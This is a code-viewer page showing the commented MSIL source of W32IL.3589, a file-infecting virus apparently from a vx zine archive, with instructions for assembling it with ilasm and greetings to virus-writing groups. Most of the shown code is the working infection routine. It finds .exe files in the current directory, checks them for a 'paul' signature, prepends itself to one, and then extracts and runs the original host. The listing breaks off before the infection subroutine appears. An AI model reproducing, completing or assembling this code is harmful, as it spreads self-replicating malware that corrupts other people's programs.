📄 29a-7.019
字号:
////////////////////////////////////////////////////////////////////////////////////////////////////[3589.TXT]////////////////
// //////W32IL.3589//////
// //////////////////////
//
// After writing my first d flat virus w32.syra (AKA w32.flatei by Mcafee/AVP, w32.flat by CA), i thought
// of optimizing it a little bit. i dragged w32.syra at my ildasm, did some necessary mods and w32.3589
// is born...
//
// w32.3589 is a variant of w32.syra which infects exe files in current directory.. infection : 1 file
// at a time... it prepends itself to the victim file and when the victim is executed, the virus in it
// infects another exe file in current directory, extracts the host bytes, writes this to "alcopaul.exe"
// and executes "alcopaul.exe"..
//
// the actual virus size is 3584 + 4 byte signature + 1 byte (?)...
//
// system requirements : .net framework/sdk/w32
//
// to produce the virus, go to msdos console, go to the directory where ilasm.exe resides, then type
//
// ilasm 3589.txt /exe
//
//
// with comments from me...
//
// why w32il? w32 = windows platform, il = intermediate language.. :P
//
//
// illawesome
// [brigadaocho]
// [rrlf]
//
// greetz
//
// .syra ("my little sis.. study hard..")
// .alcopaul ("LAME VB CODER! (this time, LAME C# coder) eherm.. heheheheh...")
// .jackie ("expecting new stuffs from you man... the INTERVIEW.. hehehheh")
// .slagehammer ("thanks for being there...")
// .philie ("amsterdam!")
// .ergrone ("cpl rulz.. anotha great delphi coder...")
// .powerdryv ("my long lost sally oners..")
// .quote from 29a6 article ".NET/dotNET virus" by benny/29a ("....Everything began when I started to explore
// the .NET Common Language Runtime
// platform, designed by Microsoft. I wrote an article about it and started to
// work on one very trivial virus that could show how to use class librariez.
// Everything in C#.
// The idea was very simple - create sample of prepender written in C#. How easy
// it sounded, so hard to code it was. C#, such like Java have VERY STRICT type
// checking. And I figured out that there's NO easy way how to work with
// stringz - once a string is defined, you CAN'T change it - and I needed to
// do that, becoz it was very important for viral functionality.
// That sucked....")
// .benny ("heh!. i did w32.syra in one day. anyways, thankie for the inspiration.. heheehh")
// .brigadaocho ("b8 ezine #1!")
// .rrlf ("rrlf #3!")
// .diskordia/[rrlf] ("hottie!")
// .johnlw ("read the gnu/gpl!")
// .kahuna ("let's be friends.. hehheeheh")
// .LJ ("thanks for producing vxtasy.. the definitive guide man..")
// .Energy ("kewl vb codes, and delphi codes too.. suggestion : p2p worms suck.. :)")
// .Arkhangel ("heya, boss")
// .
// .most of all, my vx soulmate PetiK ("hey man. cum back to the scene and let's rock the casbah.. :)")
//
// e-mail me at alcopaulvx@yahoo.com
// see my codes at http://alcopaul.cjb.net
// http://brigadaocho.host.sk
//
// september 12, 2002 : edited the disasm comments and added some greets
//
//
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
.module extern shell32.dll
.assembly extern mscorlib{}
.assembly v3589{}
.subsystem 0x00000002
.class private auto ansi beforefieldinit v3589_
extends [mscorlib]System.Object
{
.class auto ansi nested public beforefieldinit Win32
extends [mscorlib]System.Object
{
.method public hidebysig static pinvokeimpl("shell32.dll" autochar winapi)
int32 ShellExecute(int32 hWnd,
string oper,
string file,
string param,
string dir,
int32 type) cil managed preservesig
{
} // essential win32api coz .net framework is not installed fully in my windows me... system.diagnostics.process can't be found..
.method public hidebysig specialname rtspecialname
instance void .ctor() cil managed
{
.maxstack 8
IL_0000: ldarg.0
IL_0001: call instance void [mscorlib]System.Object::.ctor()
IL_0006: ret
} // in every class, .ctor should be present..
}
.method public hidebysig static void Main(string[] args) cil managed
{
.entrypoint
// Code size 431 (0x1af)
.maxstack 6
.locals (class [mscorlib]System.Reflection.Module V_0,
string[] V_1,
string V_2,
class [mscorlib]System.IO.FileStream V_3,
class [mscorlib]System.IO.StreamReader V_4,
int32 V_5,
int32 V_6,
string V_7,
string V_8,
class [mscorlib]System.IO.FileStream V_9,
class [mscorlib]System.IO.BinaryReader V_10,
int32 V_11,
int32 V_12,
unsigned int8[] V_13,
int32 V_14,
int32 V_15,
int32 V_16,
class [mscorlib]System.IO.FileStream V_17,
class [mscorlib]System.IO.BinaryWriter V_18,
string V_19,
string[] V_20,
int32 V_21)
IL_0000: call class [mscorlib]System.Reflection.Assembly [mscorlib]System.Reflection.Assembly::GetExecutingAssembly()
IL_0005: callvirt instance class [mscorlib]System.Reflection.Module[] [mscorlib]System.Reflection.Assembly::GetModules()
IL_000a: ldc.i4.0
IL_000b: ldelem.ref // reflection
IL_000c: stloc.0
IL_000d: call string [mscorlib]System.IO.Directory::GetCurrentDirectory()
IL_0012: ldstr "*.exe"
IL_0017: call string[] [mscorlib]System.IO.Directory::GetFiles(string,
string)
IL_001c: stloc.1
IL_001d: ldloc.1
IL_001e: stloc.s V_20 // list all exe files of current directory to array
IL_0020: ldc.i4.0
IL_0021: stloc.s V_21
IL_0023: br.s IL_00a3 // if no files available, extract host
IL_0025: ldloc.s V_20
IL_0027: ldloc.s V_21
IL_0029: ldelem.ref // examine victim for sig
IL_002a: stloc.2
IL_002b: ldloc.2
IL_002c: ldc.i4.4
IL_002d: ldc.i4.1
IL_002e: newobj instance void [mscorlib]System.IO.FileStream::.ctor(string,
valuetype [mscorlib]System.IO.FileMode,
valuetype [mscorlib]System.IO.FileAccess) // open
IL_0033: stloc.3
IL_0034: ldloc.3
IL_0035: newobj instance void [mscorlib]System.IO.StreamReader::.ctor(class [mscorlib]System.IO.Stream) // read
IL_003a: stloc.s V_4
IL_003c: ldloc.3
IL_003d: callvirt instance int64 [mscorlib]System.IO.Stream::get_Length() // get full length of victim
IL_0042: conv.i4
IL_0043: stloc.s V_5 // V_5 contains its length
IL_0045: ldloc.s V_5
IL_0047: ldc.i4.4
IL_0048: sub // V_5 - 4
IL_0049: stloc.s V_6 // store result to V_6
IL_004b: ldloc.s V_4 // init variable for the signature...
IL_004d: callvirt instance class [mscorlib]System.IO.Stream [mscorlib]System.IO.StreamReader::get_BaseStream()
IL_0052: ldloc.s V_6 // offset
IL_0054: conv.i8 // convert V_6 to int64
IL_0055: ldc.i4.0 // origin
IL_0056: callvirt instance int64 [mscorlib]System.IO.Stream::Seek(int64,
valuetype [mscorlib]System.IO.SeekOrigin)
IL_005b: pop
IL_005c: ldloc.s V_4 // load object
IL_005e: callvirt instance string [mscorlib]System.IO.TextReader::ReadLine()
IL_0063: stloc.s V_7 // V_7 = read 4 bytes at the end
IL_0065: ldloc.s V_4
IL_0067: callvirt instance void [mscorlib]System.IO.TextReader::Close()
IL_006c: ldstr "paul"
IL_0071: stloc.s V_8
IL_0073: ldloc.s V_7 // 4 bytes
IL_0075: ldloc.s V_8 // "paul"
IL_0077: call bool [mscorlib]System.String::op_Equality(string,
string) // check for virus signature , 4 bytes = "paul"?
IL_007c: brfalse.s IL_0080 // false goto 0080
IL_007e: br.s IL_009d // true, next victim in array
IL_0080: ldloc.2 // check if the file is infecting itself
IL_0081: ldloc.0 // victim name
IL_0082: callvirt instance string [mscorlib]System.Reflection.Module::get_FullyQualifiedName() // virus name
IL_0087: call bool [mscorlib]System.String::op_Equality(string,
string)
IL_008c: brfalse.s IL_0090 // false goto infest (0090)
IL_008e: br.s IL_009d // true, next victim in array
.try // use Exception handling
{
IL_0090: ldloc.2
IL_0091: call void v3589_::infest(string) // infect file
IL_0096: leave.s IL_009b // finished then extract and execute the victim..
}
catch [mscorlib]System.Object
{
IL_0098: pop
IL_0099: leave.s IL_009d // if error, next victim
}
IL_009b: br.s IL_00ae
IL_009d: ldloc.s V_21 // next victim in array
IL_009f: ldc.i4.1
IL_00a0: add
IL_00a1: stloc.s V_21
IL_00a3: ldloc.s V_21
IL_00a5: ldloc.s V_20
IL_00a7: ldlen
IL_00a8: conv.i4
IL_00a9: blt IL_0025 // repeat itself
IL_00ae: ldloc.0
IL_00af: callvirt instance string [mscorlib]System.Reflection.Module::get_FullyQualifiedName() // ilasm version of app.path & "\" & app.exename & ".exe"
IL_00b4: ldc.i4.4 // open or create
IL_00b5: ldc.i4.1 // read itself
IL_00b6: newobj instance void [mscorlib]System.IO.FileStream::.ctor(string,
valuetype [mscorlib]System.IO.FileMode,
valuetype [mscorlib]System.IO.FileAccess)
IL_00bb: stloc.s V_9
IL_00bd: ldloc.s V_9 // pass variable to Binary Reader
IL_00bf: newobj instance void [mscorlib]System.IO.BinaryReader::.ctor(class [mscorlib]System.IO.Stream) // new object
IL_00c4: stloc.s V_10 // store the result in V_10
IL_00c6: ldloc.s V_9 // FileStream object
IL_00c8: callvirt instance int64 [mscorlib]System.IO.Stream::get_Length() // c# version : int V_11 = (int) V_9.Length
IL_00cd: conv.i4 // force conversion
IL_00ce: stloc.s V_11 // store the result to V_11
IL_00d0: ldloc.s V_11 // load V_11
IL_00d2: ldc.i4 0xE00 // 3584
IL_00d7: sub
IL_00d8: stloc.s V_12
IL_00da: ldloc.s V_10
IL_00dc: callvirt instance class [mscorlib]System.IO.Stream [mscorlib]System.IO.BinaryReader::get_BaseStream()
IL_00e1: ldc.i4 0xE00 // 3584 offset (skip virus bytes.. read host bytes)
IL_00e6: conv.i8 // convert 3586 to int 64 and it'll be the first parameter of Seek
IL_00e7: ldc.i4.0 // origin, 0
IL_00e8: callvirt instance int64 [mscorlib]System.IO.Stream::Seek(int64,
valuetype [mscorlib]System.IO.SeekOrigin)
IL_00ed: pop
IL_00ee: ldloc.s V_12
IL_00f0: conv.ovf.u4
IL_00f1: newarr [mscorlib]System.Byte // initialize byte array
IL_00f6: stloc.s V_13
IL_00f8: ldloc.s V_12
IL_00fa: stloc.s V_14
IL_00fc: ldc.i4.0
IL_00fd: stloc.s V_15
IL_00ff: br.s IL_0124
IL_0101: ldloc.s V_10 // initialize binaryreader
IL_0103: ldloc.s V_13 // bytes
IL_0105: ldloc.s V_15 // number of bytes read
IL_0107: ldloc.s V_14 // number of bytes to read
IL_0109: callvirt instance int32 [mscorlib]System.IO.BinaryReader::Read(unsigned int8[],
int32,
int32)
// read all bytes
IL_010e: stloc.s V_16
IL_0110: ldloc.s V_16
IL_0112: brtrue.s IL_0116
IL_0114: br.s IL_0129
IL_0116: ldloc.s V_15
IL_0118: ldloc.s V_16
IL_011a: add
IL_011b: stloc.s V_15
IL_011d: ldloc.s V_14
IL_011f: ldloc.s V_16
IL_0121: sub
IL_0122: stloc.s V_14
IL_0124: ldloc.s V_14
IL_0126: ldc.i4.0
IL_0127: bgt.s IL_0101
// end read loop
IL_0129: ldloc.s V_10
IL_012b: callvirt instance void [mscorlib]System.IO.BinaryReader::Close() // close file
IL_0130: ldstr "alcopaul.exe" // host file name
IL_0135: ldc.i4.4 // open or create
IL_0136: ldc.i4.2 // write
IL_0137: newobj instance void [mscorlib]System.IO.FileStream::.ctor(string,
valuetype [mscorlib]System.IO.FileMode,
valuetype [mscorlib]System.IO.FileAccess)
IL_013c: stloc.s V_17
IL_013e: ldloc.s V_17
IL_0140: newobj instance void [mscorlib]System.IO.BinaryWriter::.ctor(class [mscorlib]System.IO.Stream)
IL_0145: stloc.s V_18
IL_0147: ldloc.s V_18
IL_0149: callvirt instance class [mscorlib]System.IO.Stream [mscorlib]System.IO.BinaryWriter::get_BaseStream()
IL_014e: ldc.i4.0 // beginning
IL_014f: conv.i8 // convert to int64
IL_0150: ldc.i4.0 // beginning
IL_0151: callvirt instance int64 [mscorlib]System.IO.Stream::Seek(int64,
valuetype [mscorlib]System.IO.SeekOrigin)
IL_0156: pop
IL_0157: ldloc.s V_18
IL_0159: ldloc.s V_13 // host bytes
IL_015b: callvirt instance void [mscorlib]System.IO.BinaryWriter::Write(unsigned int8[])
IL_0160: ldloc.s V_18
IL_0162: callvirt instance void [mscorlib]System.IO.BinaryWriter::Close() // close alcopaul.exe
IL_0167: call string [mscorlib]System.IO.Directory::GetCurrentDirectory() // get current directory
IL_016c: stloc.s V_19 // store path to V_19
// shellexecute api
IL_016e: ldc.i4.0 // 0
IL_016f: ldnull // null
IL_0170: ldstr "alcopaul.exe" // filename
IL_0175: ldnull // null
IL_0176: ldloc.s V_19 // current directory
IL_0178: ldc.i4.1 // show normal
IL_0179: call int32 v3589_/Win32::ShellExecute(int32,
string,
string,
string,
string,
int32) // shell execute host
IL_017e: pop
//use seh to delete alcopaul.exe
.try
{
IL_017f: ldstr "alcopaul.exe"
IL_0184: call void [mscorlib]System.IO.File::Delete(string)
IL_0189: leave.s IL_018e // check if alcopaul.exe exists
} // end .try
catch [mscorlib]System.Object
{
IL_018b: pop
IL_018c: leave.s IL_017f
} // end handler
IL_018e: ldstr "alcopaul.exe"
IL_0193: call bool [mscorlib]System.IO.File::Exists(string)
IL_0198: brfalse.s IL_019c // false then end virus
IL_019a: br.s IL_017f // host temp file still exists, goto del alcopaul.exe
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -